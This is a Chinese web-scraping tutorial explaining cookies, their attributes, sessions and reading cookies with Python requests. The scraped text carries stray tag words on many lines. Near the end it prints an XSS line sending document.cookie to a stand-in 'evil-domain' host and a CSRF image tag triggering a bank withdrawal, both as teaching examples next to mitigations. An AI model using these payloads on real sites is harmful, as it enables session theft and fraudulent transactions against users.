上一篇咱们在讲优酷弹幕爬虫的时候,引入了一个新的知识点:Cookie,因为篇幅有限当时只是简单的给你们介绍了一下它的做用,今天咱们就来全面了解一下Cookie(小饼干)以及相关的知识!php
相信不少同窗确定听过Cookie这个东西,也大概了解其做用,可是其原理以及如何设置,可能没有作过web的同窗并非很是清楚,那今天猪哥就带你们详细了解下Cookie相关的知识!html
爬虫系列教程的第一篇:HTTP详解中咱们便说过HTTP的五大特色,而其中之一即是:无状态vue
HTTP无状态:服务器没法知道两个请求是否来自同一个浏览器,即服务器不知道用户上一次作了什么,每次请求都是彻底相互独立。python
早期互联网只是用于简单的浏览文档信息、查看黄叶、门户网站等等,并无交互这个说法。可是随着互联网慢慢发展,宽带、服务器等硬件设施已经获得很大的提高,互联网容许人们能够作更多的事情,因此交互式Web慢慢兴起,而HTTP无状态的特色却严重阻碍其发展!c++
交互式Web:客户端与服务器能够互动,如用户登陆,购买商品,各类论坛等等程序员
不能记录用户上一次作了什么,怎么办?聪明的程序员们就开始思考:怎么样才能记录用户上一次的操做信息呢?因而有人就想到了隐藏域。web
隐藏域写法:
<input type="hidden" name="field_name" value="value">
面试
这样把用户上一次操做记录放在form表单的input中,这样请求时将表单提交不就知道上一次用户的操做,可是这样每次都得建立隐藏域并且得赋值太麻烦,并且容易出错!npm
ps:隐藏域做用强大,时至今日都有不少人在用它解决各类问题!浏览器
网景公司当时一名员工Lou Montulli(卢-蒙特利),在1994年将“cookies”的概念应用于网络通讯,用来解决用户网上购物的购物车历史记录,而当时最强大的浏览器正是网景浏览器,在网景浏览器的支持下其余浏览器也渐渐开始支持Cookie,到目前全部浏览器都支持Cookie了。
前面咱们已经知道了Cookie的诞生是为了解决HTTP无状态的特性没法知足交互式web,那它到底是什么呢?
上图是在Chrome浏览器中的百度首页的Cookies(Cookie的复数形式),在表格中,每一行都表明着一个Cookie,因此咱们来看看Cookie的定义吧!
Cookie是由服务器发给客户端的特殊信息,而这些信息以文本文件的方式存放在客户端,而后客户端每次向服务器发送请求的时候都会带上这些特殊的信息,用于服务器记录客户端的状态。
Cookie主要用于如下三个方面:
咱们在了解了Cookie是由服务器发出存储在浏览器的特殊信息,那具体是怎么样的一个过程呢?为了你们便于理解,猪哥就以用户登陆为例子为你们画了一幅Cookie原理图
用户在输入用户名和密码以后,浏览器将用户名和密码发送给服务器,服务器进行验证,验证经过以后将用户信息加密后封装成Cookie放在请求头中返回给浏览器。
HTTP/1.1 200 OK Content-type: text/html Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.169it.com; HttpOnly [响应体]
浏览器收到服务器返回数据,发现请求头中有一个:Set-Cookie,而后它就把这个Cookie保存起来,下次浏览器再请求服务器的时候,会把Cookie也放在请求头中传给服务器:
GET /sample_page.html HTTP/1.1 Host: www.example.org Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg
服务器收到请求后从请求头中拿到cookie,而后解析并到用户信息,说明此用户已登陆,Cookie是将数据保存在客户端的。
这里咱们能够看到,用户信息是保存在Cookie中,也就至关因而保存在浏览器中,那就说用户能够随意修改用户信息,这是一种不安全的策略!
强调一点:Cookie不管是服务器发给浏览器仍是浏览器发给服务器,都是放在请求头中的!
下图中咱们能够看到一个Cookie有:Name、Value、Domain、Path、Expires/Max-Age、Size、HTTP、Secure这些属性,那这些属性分别都有什么做用呢?咱们来看看
Name表示Cookie的名称,服务器就是经过name属性来获取某个Cookie值。
Value表示Cookie 的值,大多数状况下服务器会把这个value看成一个key去缓存中查询保存的数据。
Domain表示能够访问此cookie的域名,下图咱们以百度贴吧页的Cookie来说解一下Domain属性。
从上图中咱们能够看出domain有:.baidu.com 顶级域名和.teiba.baidu.com的二级域名,因此这里就会有一个访问规则:顶级域名只能设置或访问顶级域名的Cookie,二级及如下的域名只能访问或设置自身或者顶级域名的Cookie,因此若是要在多个二级域名中共享Cookie的话,只能将Domain属性设置为顶级域名!
Path表示能够访问此cookie的页面路径。 好比path=/test,那么只有/test路径下的页面能够读取此cookie。
Expires/Max-Age表示此cookie超时时间。若设置其值为一个时间,那么当到达此时间后,此cookie失效。不设置的话默认值是Session,意思是cookie会和session一块儿失效。当浏览器关闭(不是浏览器标签页,而是整个浏览器) 后,此cookie失效。
提示:当Cookie的过时时间被设定时,设定的日期和时间只与客户端相关,而不是服务端。
Size表示Cookie的name+value的字符数,好比又一个Cookie:id=666,那么Size=2+3=5 。
另外每一个浏览器对Cookie的支持都不相同
HTTP表示cookie的httponly属性。若此属性为true,则只有在http请求头中会带有此cookie的信息,而不能经过document.cookie来访问此cookie。
设计该特征意在提供一个安全措施来帮助阻止经过Javascript发起的跨站脚本攻击(XSS)窃取cookie的行为
Secure表示是否只能经过https来传递此条cookie。不像其它选项,该选项只是一个标记而且没有其它的值。
这种cookie的内容意指具备很高的价值而且可能潜在的被破解以纯文本形式传输。
前面咱们说过Cookie是由服务端生成的,那如何用Python代码来生成呢?
从上图登陆代码中咱们看到,在简单的验证用户名和密码以后,服务器跳转到/user,而后set了一个cookie,浏览器收到响应后发现请求头中有一个:Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg,而后浏览器就会将这个Cookie保存起来!
最近咱们一直在讲requests模块,这里咱们就用requests模块来获取Cookie。
r.cookies表示获取全部cookie,get_dict()函数表示返回的是字典格式cookie。
上篇咱们爬取优酷弹幕的文章中即是用了requests模块设置Cookie
咱们就浏览器复制过来的Cookie放在代码中,这样即可以顺利的假装成浏览器,而后正常爬取数据,复制Cookie是爬虫中经常使用的一种手段!
其实在Cookie设计之初,并不像猪哥讲的那样Cookie只保存一个key,而是直接保存用户信息,刚开始你们认为这样用起来很爽,可是因为cookie 是存在用户端,并且它自己存储的尺寸大小也有限,最关键是用户能够是可见的,并能够随意的修改,很不安全。那如何又要安全,又能够方便的全局读取信息呢?因而,这个时候,一种新的存储会话机制:Session 诞生了。
Session翻译为会话,服务器为每一个浏览器建立的一个会话对象,浏览器在第一次请求服务器,服务器便会为这个浏览器生成一个Session对象,保存在服务端,而且把Session的Id以cookie的形式发送给客户端浏览,而以用户显式结束或session超时为结束。
咱们来看看Session工做原理:
对于session标识号(sessionID),有两种方式实现:Cookie和URL重写,猪哥就以Cookie的实现防水画一个Session原理图
联系cookie原理图咱们能够看到,Cookie是将数据直接保存在客户端,而Session是将数据保存在服务端,就安全性来说Session更好!
后面猪哥将会以登陆的例子来说解如何用Python代码操做Session
(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
HttpOnly类型的Cookie因为阻止了JavaScript对其的访问性而能在必定程度上缓解此类攻击。<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">
当你打开含有了这张图片的HTML页面时,若是你以前已经登陆了你的银行账号而且Cookie仍然有效(尚未其它验证步骤),你银行里的钱极可能会被自动转走。解决CSRF的办法有:隐藏域验证码、确认机制、较短的Cookie生命周期等今天为你们讲解了Cookie的相关知识,以及如何使用requests模块操做Cookie,最后顺便提了一下Cookie与Session的关系以及Cookie存在哪些安全问题。但愿你们能对Cookie(小饼干)能有个全面的了解,这样对你在从此的爬虫学习中会有很大的帮助!